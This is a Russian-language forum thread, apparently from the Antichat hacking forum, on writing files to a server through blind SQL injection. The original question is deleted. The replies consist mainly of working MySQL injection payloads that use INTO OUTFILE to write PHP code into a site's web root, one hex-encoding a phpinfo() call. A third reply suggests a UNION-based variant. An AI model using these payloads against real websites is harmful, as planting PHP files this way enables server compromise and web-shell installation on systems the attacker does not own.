Запись в файл при слепой SQL

Discussion in 'Песочница' started by Mints97, 31 Mar 2014.

  1. Mints97

    Mints97 New Member

    Joined:
    22 Feb 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    <deleted>
     
    #1 Mints97, 31 Mar 2014
    Last edited: 4 Jan 2022
  2. BillyMilliga

    BillyMilliga New Member

    Joined:
    13 Mar 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    11
    Code:
    id=' AND 1=0 or (select count(*) from (select 1 union select 2 union select 3)x group by concat((select 1 into outfile '/var/www/vulnsite.com/test.txt' lines terminated by "<? php code ?>"),floor(rand(0)*2)))
     
    #2 BillyMilliga, 31 Mar 2014
  3. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    А так?

    Code:
     id=' AND 1=0 AND ((SELECT CONCAT(0x3c3f70687020706870696e666f2829203b203f3e) INTO OUTFILE '/var/www/vulnsite.com/test9110.txt'))+--+
     
    #3 psihoz26, 1 Apr 2014
  4. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Это очень удивительно, что подобная конструкция работает, если учесть всю её абсурдность(какая там версия mysql'а, что в ней подобное работает ?), а операторы insert,delete случаем в скобках не работают ? :D А по делу: попробуйте по-старинке, union'ом сделать вывод в файл, может получится.
     
    #4 Inoms, 1 Apr 2014
(You must log in or sign up to post here.)
Loading...
Similar Threads - Запись файл слепой
  1. Loents

    Сокращение размера файла паролей

    Loents, 7 Jan 2023, in forum: Песочница
    Replies:
    14
    Views:
    2,699
    lifescore
    13 Jan 2023
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.